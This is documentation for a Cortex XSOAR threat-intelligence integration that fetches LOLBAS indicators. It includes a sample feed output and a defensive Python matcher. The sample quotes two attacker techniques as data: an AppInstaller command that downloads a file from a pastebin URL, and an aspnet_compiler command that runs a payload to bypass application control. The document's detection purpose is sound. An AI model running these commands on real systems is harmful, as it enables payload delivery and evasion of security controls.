
LOLBAS Feed

This Integration is part of the LOLBAS Feed Pack.

Supported versions

Supported Cortex XSOAR versions: 6.8.0 and later.

This integration was integrated and tested with version v1 of LOLBAS.

Configure LOLBAS Feed in Cortex

| Parameter | Description | Required |
| --- | --- | --- |
| Base URL | | True |
| Fetch indicators | | False |
| Indicator Reputation | Indicators from this integration instance will be marked with this reputation. | False |
| Source Reliability | Reliability of the source providing the intelligence data. | True |
| Traffic Light Protocol Color | The Traffic Light Protocol (TLP) designation to apply to indicators fetched from the feed. | False |
| Bypass exclusion list | When selected, the exclusion list is ignored for indicators from this feed. This means that if an indicator from this feed is on the exclusion list, the indicator might still be added to the system. | False |
| Use system proxy settings | | False |
| Trust any certificate (not secure) | | False |
| Tags | Supports CSV values. | False |
| Create relationships | | False |
| Feed Fetch Interval | | False |

Commands

You can execute these commands from the CLI, as part of an automation, or in a playbook. After you successfully execute a command, a DBot message appears in the War Room with the command details.

lolbas-get-indicators

Retrieves a limited number of indicators.

Base Command

lolbas-get-indicators

Input

| Argument Name | Description | Required |
| --- | --- | --- |
| limit | The maximum number of indicators to return. | Required |

Context Output

| Path | Type | Description |
| --- | --- | --- |
| LOLBAS.Indicators.Commands.category | String | The category of the command. |
| LOLBAS.Indicators.Commands.command | String | The command. |
| LOLBAS.Indicators.Commands.description | String | The description of the command. |
| LOLBAS.Indicators.Commands.mitreid | String | The MITRE ID related to the command. |
| LOLBAS.Indicators.Commands.operatingsystem | String | The operating system the command ran on. |
| LOLBAS.Indicators.Commands.privileges | String | The privileges required to run the command. |
| LOLBAS.Indicators.Commands.usecase | String | The use case of the command. |
| LOLBAS.Indicators.Description | String | The description of the indicator. |
| LOLBAS.Indicators.Detections.content | String | The content of the detection. |
| LOLBAS.Indicators.Detections.type | String | The type of the detection. |
| LOLBAS.Indicators.Name | String | The name of the indicator. |
| LOLBAS.Indicators.Paths.path | String | The path of the indicator. |
| LOLBAS.Indicators.Type | String | The type of the indicator. |

Command example

!lolbas-get-indicators limit=2

Context Example

```json
{
    "LOLBAS": {
        "Indicators": [
            {
                "Commands": [
                    {
                        "category": "Download",
                        "command": "start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw",
                        "description": "AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\\Users\\%username%\\AppData\\Local\\Packages\\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\\AC\\INetCache\\<RANDOM-8-CHAR-DIRECTORY>",
                        "mitreid": "Ingress Tool Transfer",
                        "operatingsystem": "Windows 10, Windows 11",
                        "privileges": "User",
                        "usecase": "Download file from Internet"
                    }
                ],
                "Description": "Tool used for installation of AppX/MSIX applications on Windows 10",
                "Detections": [
                    {
                        "content": "https://github.com/SigmaHQ/sigma/blob/bdb00f403fd8ede0daa04449ad913200af9466ff/rules/windows/dns_query/win_dq_lobas_appinstaller.yml",
                        "type": "Sigma"
                    }
                ],
                "Name": "AppInstaller.exe",
                "Paths": [
                    {
                        "path": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\\AppInstaller.exe"
                    }
                ],
                "Type": "Tool"
            },
            {
                "Commands": [
                    {
                        "category": "AWL Bypass",
                        "command": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\aspnet_compiler.exe -v none -p C:\\users\\cpl.internal\\desktop\\asptest\\ -f C:\\users\\cpl.internal\\desktop\\asptest\\none -u",
                        "description": "Execute C# code with the Build Provider and proper folder structure in place.",
                        "mitreid": "Trusted Developer Utilities Proxy Execution",
                        "operatingsystem": "Windows 10, Windows 11",
                        "privileges": "User",
                        "usecase": "Execute proxied payload with Microsoft signed binary to bypass application control solutions"
                    }
                ],
                "Description": "ASP.NET Compilation Tool",
                "Detections": [
                    {
                        "content": "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules",
                        "type": "BlockRule"
                    },
                    {
                        "content": "https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_aspnet_compiler.yml",
                        "type": "Sigma"
                    }
                ],
                "Name": "Aspnet_Compiler.exe",
                "Paths": [
                    {
                        "path": "c:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe"
                    },
                    {
                        "path": "c:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\aspnet_compiler.exe"
                    }
                ],
                "Type": "Tool"
            }
        ]
    }
}
```
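As an added example (not part of the integration or of this documentation), the following Python assumes only the context layout shown above: it indexes the fetched indicators by their feed paths and matches an observed process image path against them, returning the categories, required privileges and detection references a playbook could act on. The sample context is a constructed, trimmed copy of the context example.

```python
import ntpath

# Constructed sample: a trimmed copy of the context example shown on this page.
SAMPLE_CONTEXT = {"LOLBAS": {"Indicators": [
    {"Name": "AppInstaller.exe", "Type": "Tool",
     "Commands": [{"category": "Download", "privileges": "User", "mitreid": "Ingress Tool Transfer"}],
     "Detections": [{"type": "Sigma", "content": "https://github.com/SigmaHQ/sigma/blob/bdb00f403fd8ede0daa04449ad913200af9466ff/rules/windows/dns_query/win_dq_lobas_appinstaller.yml"}],
     "Paths": [{"path": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\\AppInstaller.exe"}]},
    {"Name": "Aspnet_Compiler.exe", "Type": "Tool",
     "Commands": [{"category": "AWL Bypass", "privileges": "User", "mitreid": "Trusted Developer Utilities Proxy Execution"}],
     "Detections": [{"type": "BlockRule", "content": "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},
                    {"type": "Sigma", "content": "https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_aspnet_compiler.yml"}],
     "Paths": [{"path": "c:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe"},
               {"path": "c:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\aspnet_compiler.exe"}]},
]}}

def _norm(path):
    """Normalise a Windows path: forward slashes to backslashes, lower-case."""
    return path.replace("/", "\\").lower()

def build_path_index(context):
    """Map every normalised feed path to its indicator (feed paths mix 'C:\\' and 'c:\\')."""
    index = {}
    for ind in context["LOLBAS"]["Indicators"]:
        for entry in ind.get("Paths", []):
            index[_norm(entry["path"])] = ind
    return index

def match_process(index, image_path):
    """Return a triage summary if the observed image path is a known LOLBAS binary, else None.
    Exact path first, then basename: feed paths can embed a version-specific directory
    (the AppInstaller package folder). A basename-only hit is a lead, not proof; the file
    could be a renamed copy, so the summary records which kind of match it was."""
    key = _norm(image_path)
    ind = index.get(key)
    if ind is None:
        base = ntpath.basename(key)
        ind = next((i for k, i in index.items() if ntpath.basename(k) == base), None)
    if ind is None:
        return None
    return {
        "name": ind["Name"],
        "exact_path": key in index,
        "categories": sorted({c["category"] for c in ind["Commands"]}),
        "mitre": sorted({c["mitreid"] for c in ind["Commands"]}),
        "privileges": sorted({c["privileges"] for c in ind["Commands"]}),
        "detections": [(d["type"], d["content"]) for d in ind.get("Detections", [])],
    }
```

In a playbook, the `detections` list gives the Sigma rule or block-rule reference to verify against the SIEM or WDAC policy, and `exact_path` separates a confirmed path hit from a name-only lead that needs further checks.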

Human Readable Output

LOLBAS indicators

| Name | Description |
| --- | --- |
| AppInstaller.exe | Tool used for installation of AppX/MSIX applications on Windows 10 |
| Aspnet_Compiler.exe | ASP.NET Compilation Tool |